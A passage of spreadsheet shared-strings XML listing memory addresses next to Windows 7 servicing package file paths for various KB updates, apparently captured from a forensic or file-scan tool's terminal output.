    <t>0xde947620</t>
  </si>
  <si>
    <t>0xde947a28</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_208_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde947e30</t>
  </si>
  <si>
    <t>0xde948520</t>
  </si>
  <si>
    <t>0xde948850</t>
  </si>
  <si>
    <t>86~~6.1.7601.</t>
  </si>
  <si>
    <t>0xde948908</t>
  </si>
  <si>
    <t>0xde948db8</t>
  </si>
  <si>
    <t>0xde949038</t>
  </si>
  <si>
    <t>0xde949428</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_209_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde949958</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde949d80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_42_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde949f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2685813~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94a3a8</t>
  </si>
  <si>
    <t>0xde94a6f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2685811~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94a7b0</t>
  </si>
  <si>
    <t>0xde94ab98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~x86~~6</t>
  </si>
  <si>
    <t>0xde94af80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_240_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94b268</t>
  </si>
  <si>
    <t>0xde94b320</t>
  </si>
  <si>
    <t>0xde94b728</t>
  </si>
  <si>
    <t>0xde94bb30</t>
  </si>
  <si>
    <t>0xde94be60</t>
  </si>
  <si>
    <t>0xde94bf18</t>
  </si>
  <si>
    <t>0xde94c1c0</t>
  </si>
  <si>
    <t>0xde94c5a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Media-Format-Package~31bf3856ad364e35~x86~~6.1.7</t>
  </si>
  <si>
    <t>0xde94cb10</t>
  </si>
  <si>
    <t>0xde94cf18</t>
  </si>
  <si>
    <t>0xde94d1d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2533623~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94d290</t>
  </si>
  <si>
    <t>0xde94d7a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_60_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94d990</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_76_for_KB2685811~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94da48</t>
  </si>
  <si>
    <t>0xde94dd98</t>
  </si>
  <si>
    <t>0xde94de50</t>
  </si>
  <si>
    <t>0xde94e038</t>
  </si>
  <si>
    <t>0xde94e278</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3067903~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94e5c8</t>
  </si>
  <si>
    <t>0xde94e680</t>
  </si>
  <si>
    <t>0xde94ea68</t>
  </si>
  <si>
    <t>0xde94ee50</t>
  </si>
  <si>
    <t>0xde94f038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_58_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94f0f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_85_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94f598</t>
  </si>
  <si>
    <t>0xde94f9b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB2685813~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde94fa68</t>
  </si>
  <si>
    <t>0xde94fd98</t>
  </si>
  <si>
    <t>0xde94fe50</t>
  </si>
  <si>
    <t>0xde950038</t>
  </si>
  <si>
    <t>0xde950510</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3127220_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9505c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_61_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde950938</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3074543~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9509f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_43_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde950cc8</t>
  </si>
  <si>
    <t>0xde950f80</t>
  </si>
  <si>
    <t>0xde951038</t>
  </si>
  <si>
    <t>0xde951480</t>
  </si>
  <si>
    <t>0xde951868</t>
  </si>
  <si>
    <t>0xde951b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Media-Foundation-Package~31bf3856ad364e35~x86~~6.1.7601.</t>
  </si>
  <si>
    <t>0xde951c50</t>
  </si>
  <si>
    <t>0xde952038</t>
  </si>
  <si>
    <t>0xde952398</t>
  </si>
  <si>
    <t>0xde9526e8</t>
  </si>
  <si>
    <t>0xde9527a0</t>
  </si>
  <si>
    <t>0xde952b88</t>
  </si>
  <si>
    <t>0xde9532f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3037574~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9533b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde953500</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2937610_SP1~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9537b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde953a18</t>
  </si>
  <si>
    <t>1.17514.mum_x001B_[</t>
  </si>
  <si>
    <t>0xde953ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2604115~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde953eb8</t>
  </si>
  <si>
    <t>0xde954038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2931356~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9540f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2931356~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde954390</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde954578</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9546e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_288_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde954830</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2604115_SP1~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde954d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4483458_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde954f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4483458_SP1~31bf3856ad364e35~x86~~6.1.1.1.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde955038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_76_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9553a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3097989~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde955518</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_43_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde955898</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_42_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde955a18</t>
  </si>
  <si>
    <t>0xde955c00</t>
  </si>
  <si>
    <t>0xde955e30</t>
  </si>
  <si>
    <t>0xde955f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2604115~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde956130</t>
  </si>
  <si>
    <t>0xde956680</t>
  </si>
  <si>
    <t>0xde9569b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_323_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde956a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2656356~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde956e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2656356_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9573a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3075220~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde957518</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_42_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde957848</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3122648_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde957900</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde957ce8</t>
  </si>
  <si>
    <t>0xde9582f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3037574_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9583a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_78_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde958518</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_56_for_KB3031432~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde958848</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3122648~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde958900</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB3031432~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde958ce8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_31_for_KB3031432~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde959038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3097989_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde959238</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_60_for_KB3061518~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde959630</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3097989~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9596e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_59_for_KB3061518~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde959ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB3061518~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde959e00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3023215~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde959eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_31_for_KB3061518~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95a038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_57_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95a2c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95a6a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_74_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95aa90</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_73_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95aeb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_77_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95b3a8</t>
  </si>
  <si>
    <t>0xde95b8c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_43_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95bc98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3037574~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95bd50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3075220~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95bf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3074543~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95c038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_73_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95c3f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3023215~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95c4a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95c890</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_74_for_KB3068708~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95ccb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB3075220~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95cf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3122648~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95d038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95d3f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3074543~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95d4a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_42_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95d938</t>
  </si>
  <si>
    <t>0xde95dcb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95e3a8</t>
  </si>
  <si>
    <t>0xde95e5c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3046269~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95e680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95e9b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3023215_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95ea68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_31_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95ee50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95f290</t>
  </si>
  <si>
    <t>0K_x001B_[10</t>
  </si>
  <si>
    <t>3G</t>
  </si>
  <si>
    <t>0xde95f5b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95f8e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2813347_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95f9a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_74_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95fb98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2937610~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde95fe50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_33_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde960038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3150513~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde960300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_45_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9606e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_44_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde960a18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_86_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde960ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB3102429~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde960eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_76_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9612e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_47_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde961708</t>
  </si>
  <si>
    <t>0xde961a38</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_117_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde961af0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_46_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde961d68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2639308~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde961e20</t>
  </si>
  <si>
    <t>0xde962100</t>
  </si>
  <si>
    <t>0xde9621b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_79_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9625e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SUA-Package~31bf3856ad364e35~x86~~6.1.7601.17514</t>
  </si>
  <si>
    <t>0xde9629c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_78_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde962db8</t>
  </si>
  <si>
    <t>0xde963038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2952664~31bf3856ad364e35~x86~~6.1.23.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde963200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_45_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde963530</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_54_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9635e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_44_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde963918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3037574~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9639d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_81_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde963db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_80_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde964468</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB982018~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde964520</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_78_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9649d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_47_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde964d00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3150513~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde964db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_46_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde965038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_79_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde965480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB3159398~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9657b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde965868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_81_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde965c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_80_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde966340</t>
  </si>
  <si>
    <t>0xde9666f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3150513_SP1~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9667b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_78_for_KB3184143~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde966ae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2813347_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde966b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_41_for_KB3184143~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde966f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_77_for_KB3159398~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9673c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_298_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9677b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_297_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde967ae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_8_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde967b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_296_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde967f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_295_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde968310</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2639308~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9683c8</t>
  </si>
  <si>
    <t>0xde9686b0</t>
  </si>
  <si>
    <t>0xde9687b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_352_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde968b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_300_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde968ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB2813347~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde968f80</t>
  </si>
  <si>
